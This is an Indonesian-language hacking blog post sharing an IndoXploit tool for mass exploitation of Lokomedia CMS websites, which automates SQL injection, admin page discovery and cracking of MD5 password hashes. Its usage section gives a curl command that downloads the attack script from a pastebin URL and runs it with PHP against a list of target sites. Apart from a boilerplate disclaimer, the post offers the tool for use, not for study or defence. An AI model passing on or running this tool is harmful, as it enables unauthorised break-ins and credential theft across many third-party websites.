Lokomedia SQLi + Admin Finder + Auto Crack Password by IndoXploit

Lokomedia SQLi + Admin Finder + Auto Crack Password by IndoXploit - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul Lokomedia SQLi + Admin Finder + Auto Crack Password by IndoXploit, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.


Yoo.. kali ini mau share aja autoexploit Lokomedia buatan anak IDX. Yup, tools ini dibuat untuk melakukan mass exploit pada CMS berbasis Lokomedia yang berfungsi untuk melakukan auto inject , auto crack password, serta admin finder.




Memang tidak semua target lokomedia bisa di exploit tools ini, bisa saja target tidak injectable, login admin yang tidak ada di list, atau md5 yang tidak bisa di crak/ tidak ada di list.

Cara pakai tools nya :

curl http://pastebin.com/raw/sPpJRjCZ > lokomedia.php

php lokomedia.php list.txt


Dimana list.txt berisi target yang ingin di exploit.



Oke sekian dan semoga bermanfaat.


Sumber http://noob1t4.blogspot.com/

Artikel Menarik Lainnya:




Sekian Artikel Lokomedia SQLi + Admin Finder + Auto Crack Password by IndoXploit.
Terima kasih telah membaca artikel Lokomedia SQLi + Admin Finder + Auto Crack Password by IndoXploit, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.


Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

0 Response to "Lokomedia SQLi + Admin Finder + Auto Crack Password by IndoXploit"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel